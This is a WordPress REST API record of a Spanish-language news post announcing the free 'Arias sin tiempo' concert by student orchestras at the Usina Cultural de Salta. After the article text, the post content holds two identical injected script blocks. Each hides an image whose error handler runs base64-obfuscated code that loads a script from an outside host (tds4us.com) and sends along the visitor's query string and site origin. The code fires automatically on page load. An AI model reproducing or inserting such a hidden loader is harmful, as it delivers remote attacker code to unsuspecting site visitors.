{"id":5294,"date":"2025-07-02T12:48:44","date_gmt":"2025-07-02T15:48:44","guid":{"rendered":"https:\/\/circuitosalta.com.ar\/?p=5294"},"modified":"2025-08-13T23:28:16","modified_gmt":"2025-08-14T02:28:16","slug":"manana-se-brindara-el-concierto-arias-sin-tiempo-en-la-usina-cultural","status":"publish","type":"post","link":"https:\/\/circuitosalta.com.ar\/?p=5294","title":{"rendered":"Ma\u00f1ana se brindar\u00e1 el concierto \u00abArias sin tiempo\u00bb en la Usina Cultural"},"content":{"rendered":"\n<p><strong><em>Relaciona un repertorio l\u00edrico cl\u00e1sico con m\u00fasica popular. La entrada es libre y gratuita.<\/em><\/strong><\/p>\n\n\n\n<p>Este&nbsp;jueves 3 de julio a las 20 en el SUM de la Usina Cultural de Salta, se llevar\u00e1 a cabo el concierto \u00abArias sin tiempo\u201d, una propuesta singular que relaciona repertorio l\u00edrico cl\u00e1sico con m\u00fasica popular y nuevas m\u00fasicas con arreglos y versiones originales.<\/p>\n\n\n\n<p>El espect\u00e1culo estar\u00e1 a cargo de la Orquesta Acad\u00e9mica \u201cJos\u00e9 Lo Giudice\u201d y la Orquesta de Fusi\u00f3n \u201cJJ. Botelli\u201d de la Escuela Superior de M\u00fasica de la Provincia N\u00b0 6003 (ESM), bajo la direcci\u00f3n art\u00edstica y musical del Mtro. Jorge Diego V\u00e1zquez. Con entrada libre y gratuita, el evento invita a sumergirse en una experiencia visual y sonora que trasciende el tiempo y las fronteras estil\u00edsticas.<\/p>\n\n\n\n<p>El programa incluye arias de \u00f3peras emblem\u00e1ticas como Las bodas de F\u00edgaro, Don Giovanni y Rinaldo, obras de H\u00e4ndel, Mozart, Verdi, Piccinni, as\u00ed como piezas instrumentales de Amy Patterson, Jorge Bravo de Rueda y Carlos Guastavino y nuevas composiciones como Tu dulzura, de Federico Fern\u00e1ndez.<\/p>\n\n\n\n<p>La propuesta se enmarca en una b\u00fasqueda por actualizar el lenguaje l\u00edrico y acercar la m\u00fasica acad\u00e9mica a nuevos p\u00fablicos.<\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<p>Fuente:&nbsp;<strong>Secretar\u00eda de Prensa y Comunicaci\u00f3n<\/strong><\/p>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script><script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>Relaciona un repertorio l\u00edrico cl\u00e1sico con m\u00fasica popular. La entrada es libre y gratuita. Este&nbsp;jueves 3 de julio a las 20 en el SUM de la Usina Cultural de Salta, se llevar\u00e1 a cabo el concierto \u00abArias sin tiempo\u201d, una propuesta singular que relaciona repertorio l\u00edrico cl\u00e1sico con m\u00fasica popular y nuevas m\u00fasicas con arreglos [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":5295,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"tdm_status":"","tdm_grid_status":"","footnotes":""},"categories":[13],"tags":[],"class_list":{"0":"post-5294","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-festivales"},"_links":{"self":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/5294"}],"collection":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=5294"}],"version-history":[{"count":3,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/5294\/revisions"}],"predecessor-version":[{"id":6450,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/5294\/revisions\/6450"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/media\/5295"}],"wp:attachment":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=5294"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=5294"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=5294"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}